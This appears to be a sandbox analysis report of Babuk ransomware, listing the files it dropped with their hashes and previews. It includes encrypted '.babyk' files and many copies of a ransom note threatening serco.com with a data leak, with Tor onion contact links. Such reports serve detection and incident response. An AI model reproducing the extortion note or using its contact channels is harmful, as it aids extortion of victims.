                                                                            SSDEEP:12:gt93E3wj3ZE5dH3qpWcJyqmNLtI9FF1Pcnif0ZZ:gn3v6H6scABTwcifC
                                                                            MD5:7E5CACBC57BAB2B22588C5E4C1BFD394
                                                                            SHA1:44DD618C316D4756CF77248A0C534C9A990B122A
                                                                            SHA-256:18CCAFF5595A8E3119928E297B3EB474041355E2CA5E80DB23BCC9BCB4C07D67
                                                                            SHA-512:DB7566766EBFAF6C8258474477B0CB55B1E2404E4E7E7DB580A0400B95F32861FE9E9F8055BE768D17AC1E0FB70919C927FE451764CED70FAD205D4836276EEF
                                                                            Malicious:false
                                                                            Preview: $...W...KcY.vhJ....Nf. R5.)..........I....I..{..>.~t.]....J../l..~....6...#..1!i..o..Z{x....m..K...............G.gs.f.j..).v...{.nO..=..3..:a..D...~..j....f...TH^....B.r.O.>...].SG3.7V).2WN.W>Y.W...T9.``|....>..%.........OyX.'..z,....T.......I..F...Jl..].....skf.iG....j...r8Rf)(.{.'...t.{....1...-H.z....h[...-..s......D`}.<..'..q.+Agj......I.:S..J..9..i.r/.3O....p..-S......Ox|{..92...E..........W...k....f.K^....5........J....fa..I....choung dong looks like hot dog!!
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):2662
                                                                            Entropy (8bit):7.919052237953245
                                                                            Encrypted:false
                                                                            SSDEEP:48:1yl6hruWYIBpty+oAWKe6YXOdnbETbF/7wlSwzeLtUpaHrm/+4NTE8+P/8nI:wUhrUEFRW3KdnboFz8St9yyvz
                                                                            MD5:92AEE9955DAAB207030BD904A7ED7126
                                                                            SHA1:C9F2247057571989149FE7FF043BC5AC332903E2
                                                                            SHA-256:120D77DF96030A496C2534FABDD1EC81E859A697494413D1A17798E93E4A3422
                                                                            SHA-512:376BD6CAEE8D58FFB763E337096B6DA3396D722537F873A2755DA2B3AE6FBFD8E60B3C512080D5AEBF52D3B4079EBEF26238611164065C9EB5986BDE149592AC
                                                                            Malicious:false
                                                                            Preview: ........Foy.g.R_ .-....q..U.Fb....U._.2...}{..X|....-......m.H..TC..q~...jn..j.P..{.......F..>...).2....5.V.X....{N..QX.F......f..yye.F...i_.<.%}..A...M...rQ../.MN.Z.<....%n.w........*ze..{[.S..P..).......M..sF.|..sl..1..xU....`.2.....O.=&=..X...WJb.C7h.aQ.Y.H.s...R.<.H.B....T....O.C..R.....6...\.".]WC.m..&..]Y.r.....R..........J.A......r5.$u..L..._S.\v..(a.;..j......H..... .M..w....mw.\O..}..&...e9.k..<wX....d.C>.5._.qb._.,..Kzq1+.......dJ...L..{...Zu.!e..............9.]................- ..:....W.[....2.?.pD..,....zk.=...P....W, ...n...en..0.nB..j.0G..'.p.,~..{.v....!.73..+HA.)..+.Yga.bAiJ.....}.6......`}...M...Z.2....Kd...C.... ....X..avI...=C.....U.>.{.u..[S......2a...~.b.....S.$F.a...N +O.G..G..N.0.o.I.......:1......S..w....H,K.....y...*.....jy..I.j.D..m..g.J...)P...IT"..1K..t.......L..o.K.t.}|.8.P.N6.........4...~..4.[........0i..A.I..b.).#.M. .z..M.O.....1.fG)..1..Z....5..v....../..E..G......k..5l.Q.#+.%.}C...JY....Z...).nG(.
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE (x86).lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1442
                                                                            Entropy (8bit):7.85925512350611
                                                                            Encrypted:false
                                                                            SSDEEP:24:I82DMUI4JysdC+rljdGZ98GfKFfbpNseSDOCoCnMK4cZ+zhil1blZQNAkJod0vC:h2DJzCPhGAeSDGCnMKNQhiTP8AkJodD
                                                                            MD5:962B434F7CC1E959472E896C26C7CB5A
                                                                            SHA1:9C88222CE4424535D3BC9FF3FD0BB83E8E6E578D
                                                                            SHA-256:3B962BE6E967DDED6CF887D04F75728FAF1C7CB95CD358983B833C9EE705BE89
                                                                            SHA-512:7D74AAA726FFFE4FEF84074450AB6183870E870C0157029DAB73F91D88A944BD28C02AF33A1A8D881879E0DC90DE5512EE0F7DEBA277AA8C3690880FEB466FCE
                                                                            Malicious:false
                                                                            Preview: ..!.....^..1.b.j....3X......;...T\....Z.06..... ...yd..p...Y*}.YtWv.-1H.L..{t.j2|.b......`..$........s...F.U.9..JL..+.*..Hj5.f.0.Gu5....x.(Q..b.r.....,[v.C..8|..=j...'.fvt...D....|.5n.......N8.".z.....t.L.LP;.D...?..6......q$.K- .c.V...G.w.. .`.k...=...&..b...]._.y".?......;...gP>.......(.......\....h...]..2...<a..=#...8!...Kx...O....-4X...J.i>...+6.;..gB.`DY..OZ=U26z....+..&.}..Nu5O/..;?..86...6..(v...D.D._..N...5..pD...?vx0..R..A..e:(....../.G.......W..%.....[....<.....~(D.M. ....S..m...:.~..6....;...;.........j".9;P....#...}..........!....2:......)..-.Aq..K99J6.r.8.&=...xe..l.'.~...B....Z..L"h._..TS...B.9/J...(........o...S.z...1.r.r=.=.g.X..}.L.N.@...........jo.)..sW.g8.2...|F%..B.....9`..4.{..tL...g{..u:Q'..`.....+..4>o.Vb....{cR...5..>.V<.I....}23.%um*...O...M..V..g..}.t9..Y*..b.%bx'm=..ZCFiZ......P..^ .w..p6.#.\...mB....(..v-...V...:.....u....O.K..,.*.yeS............n...v4BUFdB..a...I.....d.@Z..F.;?`.$<hK../...w..X...
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1442
                                                                            Entropy (8bit):7.858766803807557
                                                                            Encrypted:false
                                                                            SSDEEP:24:S2mdN6fcB7zqNzg7lJz4fQVsXIG9rvoYM9RCgLChANl50EdLhwrH8C7RMPRLo88L:S2LcRzqN0cQELSAAj59BnUMZLTvUYX76
                                                                            MD5:ACDA8E06467AAB2CDCDC3C3844BF30DF
                                                                            SHA1:26085B815F2DFE2080CDAD47FCC8614A61A8D617
                                                                            SHA-256:A0F1CB9EA996A2C04CB96BAA2A4C9B9489221DB0FAB006A0D8D9E8BF95699FBC
                                                                            SHA-512:3EE38AE319B5AE9FCFDD1A508D0141418F114AE27ED9899374EBAA015BCFD69227EEAA8A017485581FC83263DCD64DEC447EAEE8A650C7788178D31D2FBB60F1
                                                                            Malicious:false
                                                                            Preview: (.B....)U.BfF.....Y*._.!.3UF..?.n.v.+.^.r.BX~....2..\!..{Q...(.<.X....<$....6.s.U.M.bB[...r.].<.?L-........&.o.8n\3..C..i..r.(....R...G....y.AS.^.....|..Et.l..L.R(<.fM.X...C).D.=.....V.:.I2.8H.(+.bJ....Z.. .../.{x.!.V....$t..]..~.......,.Q......0.....M..Q.5.C...r.O,....n....>B.GHk.EDA..S.."'.I?.5/..*.%..h"$.....]}r.....j....h*^)]..VZV...V[..$..J...a..6..X...q..\(..<.wJ.L.V}...U.B.............Z,.E..|.....{.....0.Sa..;l.+...9E.>.|v.....v.E..8.R...9\....&f.........&r5..mGG.L....?.P)59...ic.|6...`Lp.Md...}.u..t.,8.X...@...1...<....d.Pp...i*..h.dV.uLg...(<J<D[...mkM.....-.~$....dAV..Q..L..O.3.....T.e...T..`...;*.1....@Y.|]D`/?...(..n....U....^.m..........n.}w.5}* .R.%%..e..>..%...D.....y^6<..j.4.....x.,.....b..U.Ir...).t..y....[".._o.W.3.|..X..)f.8.~.w.[.o.............Z..p.lA.)..}..6.N..kdz.P.!.(DR.}.q....i.....dP.q?.....z.1.,.mK....].4.:...Dx.)..+M....;...'..!ZLR... .e.......^<.P.J@.Q.m|..'.H..G.YT...9.\......CD.....-.0P......I\....B.
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):2662
                                                                            Entropy (8bit):7.936880602845185
                                                                            Encrypted:false
                                                                            SSDEEP:48:d4HRm/7vq52RAe0jgygPJ+/Bu3zPaCHpYg9yQrtJm8Luuh7ZSx8r9ohDJ:dI0F2gygPJ8E3lCNStJVuuhVS+RohDJ
                                                                            MD5:624FB903A479D44709481F28227BE18A
                                                                            SHA1:847C2A331934024A5EFC027BEEFE7EC0A17ABC0C
                                                                            SHA-256:7FE1DB94220D0D7B667CC4EABB54B0FFFC0BF7BE9C940315E33B30D83BD9F33B
                                                                            SHA-512:AF82DC55BD9ADE06A7D24AA4095E859CC3C7650E3E5CE30DED3CB001FED376F9356BB92239B36BC060087B42185844EB4BA79F70AA7A3E870F05ADF230F8BAB1
                                                                            Malicious:false
                                                                            Preview: %.9M..-I."j..=..d...d=(.......fQ...x..Qy..1{.....Vw.J.L.s.q..I*...!.c.2.8...........#3.F...c.S*.xI@...d#.....5^.......?.Z.0.e?[...3$........gs...P.=...W.Hc.|.;.... ...Yr'/l\X.!u]...HE4.`4u..2..M....E.9V.5c.)bi.v...hu`Q..1....vWc.LE...1....^h..w.er.....e.^....b...|....&.0p....,.;>...vz...m..m..A<..X.xo+.....I..b....LEY[..P..n..#N..5.E..F-P+.).#i]...K.y..(.B.(.@.q..j..S...k[...*......[....o.j.=.w.....l..?&.3..eo.)'3qs..o.3dO...y....x..*.N..P...rK|B....T.F[T.vD...h.s.`%;..g.v..K..P..d....%.=.....[.....H.<.. W.4..6M-.!.f..+Ok.AT|{.UF..{;..x.0V)E.k.V.wHN..0I.UP|Ro.l..s....H.kp.J<]...yNk...U...tI....th.<....EnE*..s.K..a...,.c...w......v....;mGQ.L..F.'!. '.Cv=5*%:U(i<.6.8:.u.X'.....$..nb...o`.........C..*..@...N82.?\..yjf.}';...?;C38M....?$*".s.D.y..8..X....W.$...Y..-A.Z~.m....Q....9W..r.|..H*..;....?.U"N.p..K..7...1......M.R.;.-".....J....3..K..,.&.X~/x.e.x..8....!."f..^.d.....k.$(..6S.5....r..~QQ....-.....]&.....1...=.....h.... .pm^.Z......
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\Desktop\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\Documents\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\Downloads\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\Favorites\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\Links\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\Music\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\NTUSER.DAT.LOG1.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):57512
                                                                            Entropy (8bit):7.996530664770117
                                                                            Encrypted:true
                                                                            SSDEEP:1536:aSYXjoCaioBI7QK6whIu3FTz8tmxOGVvNh5Ol:aJUCavRDEh1uch8
                                                                            MD5:71742DE25FAD93431BD579F5FE514729
                                                                            SHA1:066644280809ED01B3098B8119C29E32CA6751B8
                                                                            SHA-256:6E3ADCFF924E4A9FFB51D217B6C26D5D1B21DDB0A8CF088A8D4A6C01C069CE4F
                                                                            SHA-512:A5A326B8D80BE54E74F1ED5DA2295FD3E94C94D3157C144D05BD8C92C47E458738ECE5FCEB844E0E977F378A6F6FE192116F6EBF44CB9047B6AA81F23B3A2FD4
                                                                            Malicious:true
                                                                            Preview: {.I.........~|.E.V.....a..$2s}A_.S.J.`y`.......2Xi..z.B..Z.Aq/7..>..f....o.4....#0..Z.......2#iL.......,j...X.......B.W.x.....jNm.}.Q.HpA..q...X].9.Q.C..d..Un....DW_...w.W.<..n.....>x....V.e....!...a.*....]....U.r..+.........+_...^.#.?..V...l!.G..~....f0...r.K...:y\$G.1.-|...R..c.8.V.%j..7._j...3..'.E^.I.!@!....0..D...'.j.dw...RY.._}.3....<.)...T.}t..Ax.-s..kV_....2.K....G...y.\.W.h..06o.E.|..kVUG.v..">.&)`p.I.z....C. p...M.+.5nD...........0G./ro[.G`.......SqLR..L........lp......%..6....c...3-1...JD...E._P9".h-..3.....B.2.T........8~..=C..s.4.sI....d.$..G....c.u..R.[U.!.!".-..=.\.a:..(...&.(..F..C..y....U....H..'..?../..\.)..n)|4Y.4..I...-x...9,..?.{.V...:..v.T!...~:Z.4U..5...'.S..7(..K.~:....r..I.f..eb./.O...cR.3}.l...'.(..!......._..j....E.....H.....a.......L..F...d..3a[l^9L7_Q.u.95.Y.../..X...I....z7.df...*dr.Oy..Z....z....{..?.{...j.;.y.f%e..P....1.bo...uDM.1I......o.q...............6.. ..Lg9....:. l.i.|.6r...B9.%..V..JB..D".7..t
                                                                            C:\Users\Default\NTUSER.DAT.LOG2.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.4596564293617424
                                                                            Encrypted:false
                                                                            SSDEEP:3:tliuvqE13+jreZUz0BP6DjrTj7Uk718+yvBqUNJ5x0NLUxNvEEn:SgN34qqw56DDj4Y8+yvBqAJ5x0L0vtn
                                                                            MD5:29BBC4BA3978D3B50DABEEED0EA90798
                                                                            SHA1:029038BD8785D7C9A9B984B0C681FD567FA3F721
                                                                            SHA-256:140E6300A63EFCC8DABE39C6CF90BF8DF88557BFC36F4B09E3F19E6625ACF401
                                                                            SHA-512:FEA9376B5C49C60A2524161E777500FADD9E821DED88DAE13C72DC8088C5290A9315439D5216150EADEAC5483EDD13C2AE0F40BD38ECD59BD1E565FC5AB532AA
                                                                            Malicious:false
                                                                            Preview: ....Q...._.^..._...W_.^....-<n....(.......|1V9.'.w.....Hn.ao..j.....EMH...19.N......M....%nK...5on..v..a8?.O...,..emn}}G.5{.....choung dong looks like hot dog!!
                                                                            C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TM.blf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):65704
                                                                            Entropy (8bit):7.997083212115577
                                                                            Encrypted:true
                                                                            SSDEEP:1536:2Sy8uJajKoWDCOc8igmjxdFYLqUGG2F7BI:recKoWDCWmj7e2Mq7BI
                                                                            MD5:C770F55D520F958E6645C853E7888EE1
                                                                            SHA1:E3BB3183910742C339C949CFB34C06E2252375A6
                                                                            SHA-256:08D36FDA52CFA90C9AB1B9168D221FF41ECCD41A6EB95D70E19454683B0512B8
